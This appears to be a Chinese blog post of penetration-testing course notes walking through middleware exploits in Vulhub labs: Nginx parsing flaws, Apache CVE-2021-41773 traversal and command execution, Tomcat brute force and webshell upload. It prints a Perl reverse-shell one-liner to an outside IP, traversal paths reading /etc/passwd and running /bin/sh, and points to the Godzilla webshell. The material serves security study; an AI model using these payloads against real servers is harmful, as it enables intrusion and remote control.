第59天:服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx

目录

思维导图

中间件以及框架列表:

案例一:中间件-Nginx-文件解析&命令执行等

配置不当造成的解析漏洞

 文件名逻辑漏洞

案例二: 中间件-Apache-RCE&目录遍历&文件解析等

Apache-RCE

目录穿越漏洞

文件解析

案例三:中间件-Tomcat-弱口令&文件上传&文件包含等

弱口令

文件上传

文件包含


思维导图

中间件以及框架列表:

IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere,Jenkins,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery

案例一:中间件-Nginx-文件解析&命令执行等

nginx解析漏洞:

配置不当造成的解析漏洞

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

上传图片时抓包

发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径访问图片

 加上/1.php

 文件名逻辑漏洞

靶场:Vulhub - Docker-Compose file for vulnerability environment

留一个空格

加入脚本

重新抓包访问,留两个空格加上.php

hex 0x20 0x00.php

成功返回php

案例二: 中间件-Apache-RCE&目录遍历&文件解析等

Apache-RCE

靶场环境:Vulhub - Docker-Compose file for vulnerability environment

访问路径:

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh

反弹shell的脚本

echo;perl -e 'use Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

访问抓包

开启监听

运行成功反弹shell

目录穿越漏洞

前提条件:

  • 版本等于2.4.49
  • 穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的)

可以帮助看到web目录外,别的系统配置文件

靶场环境:https://vulhub.org/#/environments/httpd/CVE-2021-41773/

利用icon目录必须是一个真实存在的目录,%2e为 "."

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

 如果cgi和cgid模块被设置了,那么可以进行命令执行

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

文件解析

利用条件:

1.黑名单验证,不能上传 php

2.能够上传

靶场环境:  https://vulhub.org/#/environments/httpd/CVE-2017-15715/

上传php文件,会显示不能上传

上传的时候抓包

发送到repeater修改

 把空格改为%0a

成功访问

案例三:中间件-Tomcat-弱口令&文件上传&文件包含等

弱口令

tomcat通过爆破弱口令能够进入后台终端,取得webshell权限

靶场环境:https://vulhub.org/#/environments/tomcat/tomcat8/

加上默认地址  /manager/html

登录抓包:

该数据为账号:密码的base64位编码

发送到intruder爆破,添加变量

设置字典

 成功暴力破解

文件上传

补充知识点:

war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。可以将其放在tomcat下的webapps目录中打开并运行

找一个jsp编写的大马,把他压缩为war后缀的。

上传jshell文件

这里大马的账号密码为

访问大马  根目录/jshell/jshell.jsp

功能截图

哥斯拉下载地址:Release v4.0.1-godzilla · BeichenDream/Godzilla · GitHub

从网上下载哥斯拉

 运行

生成木马

 压缩为war后缀

访问页面为空白

用哥斯拉连接

添加后执行

CVE-2017-12615,可以采用put形式进行上传

靶场: https://vulhub.org/#/environments/tomcat/CVE-2017-12615/

搭建起来以后,抓包,put方式上传

 哥斯拉测试连接

文件包含

漏洞利用工具:GitHub - sv3nbeast/CVE-2020-1938-Tomact-file_include-file_read: Tomcat的文件包含及文件读取漏洞利用POC

执行该脚本如果有返回值说明有漏洞

  • 35
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值